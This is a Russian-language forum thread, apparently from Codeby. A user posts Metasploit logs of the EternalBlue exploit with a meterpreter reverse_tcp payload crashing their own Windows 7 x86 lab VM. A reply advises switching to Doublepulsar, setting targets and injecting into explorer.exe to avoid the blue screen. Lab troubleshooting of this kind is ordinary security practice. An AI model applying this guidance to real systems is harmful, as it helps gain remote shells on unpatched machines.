Проблема eternalblue синий экран

Tayrus · 21.02.2018

У меня есть виртуалка на ней стоит win7 profes x86 без обновлений и антивиря
Запускаю в метасплоите eternalblue

Код:

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[+] 192.168.1.7:445 - Connection established for exploitation.
[+] 192.168.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.7:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.7:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600    
[!] 192.168.1.7:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 192.168.1.7:445 - Disable VerifyArch option to proceed manually...
[-] 192.168.1.7:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.

Payload windows/meterpreter/reverse_tcp пробовал еще windows/x64/meterpreter/reverse_tcp
Я отключаю Disable VerifyArch

Код:

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[+] 192.168.1.7:445 - Connection established for exploitation.
[+] 192.168.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.7:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.7:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600    
[+] 192.168.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.7:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.7:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.7:445 - Starting non-paged pool grooming
[+] 192.168.1.7:445 - Sending SMBv2 buffers
[+] 192.168.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.7:445 - Sending final SMBv2 buffers.
[*] 192.168.1.7:445 - Sending last fragment of exploit packet!
[*] 192.168.1.7:445 - Receiving response from exploit packet
[+] 192.168.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.7:445 - Sending egg to corrupted connection.
[*] 192.168.1.7:445 - Triggering free of corrupted buffer.
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[-] 192.168.1.7:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.7:445).

И синий экран
Как это вылечить?

flesh91 · 21.02.2018

Tayrus сказал(а):

У меня есть виртуалка на ней стоит win7 profes x86 без обновлений и антивиря
Запускаю в метасплоите eternalblue

Код:

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[+] 192.168.1.7:445 - Connection established for exploitation.
[+] 192.168.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.7:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.7:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600   
[!] 192.168.1.7:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 192.168.1.7:445 - Disable VerifyArch option to proceed manually...
[-] 192.168.1.7:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.

Payload windows/meterpreter/reverse_tcp пробовал еще windows/x64/meterpreter/reverse_tcp
Я отключаю Disable VerifyArch

Код:

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[+] 192.168.1.7:445 - Connection established for exploitation.
[+] 192.168.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.7:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.7:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600   
[+] 192.168.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.7:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.7:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.7:445 - Starting non-paged pool grooming
[+] 192.168.1.7:445 - Sending SMBv2 buffers
[+] 192.168.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.7:445 - Sending final SMBv2 buffers.
[*] 192.168.1.7:445 - Sending last fragment of exploit packet!
[*] 192.168.1.7:445 - Receiving response from exploit packet
[+] 192.168.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.7:445 - Sending egg to corrupted connection.
[*] 192.168.1.7:445 - Triggering free of corrupted buffer.
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.7:445 - Connecting to target for exploitation.
[-] 192.168.1.7:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.7:445).

И синий экран
Как это вылечить?

Если архитектура x86 то нужно использовать Doublepulsar, так как эксплоит который ты используешь розчитан только для x64

---- Добавлено позже ----

Настроишь все по инструкции из ссылки выше, не забудь указать set targets, и так же попробуй с processinject поэксперементировать, потому что у меня на процесе который по дефолту указан, иногда возникает синий экран на x86, поэтому я его менял на explorer.exe

Tayrus · 21.02.2018

flesh91 сказал(а):
Если архитектура x86 то нужно использовать Doublepulsar, так как эксплоит который ты используешь розчитан только для x64

---- Добавлено позже ----

Настроишь все по инструкции из ссылки выше, не забудь указать set targets, и так же попробуй с processinject поэксперементировать, потому что у меня на процесе который по дефолту указан, иногда возникает синий экран на x86, поэтому я его менял на explorer.exe

Огромное спасибо)))

Все сервисы Codeby

Поиск

Поиск

Проблема eternalblue синий экран

Tayrus

flesh91

Tayrus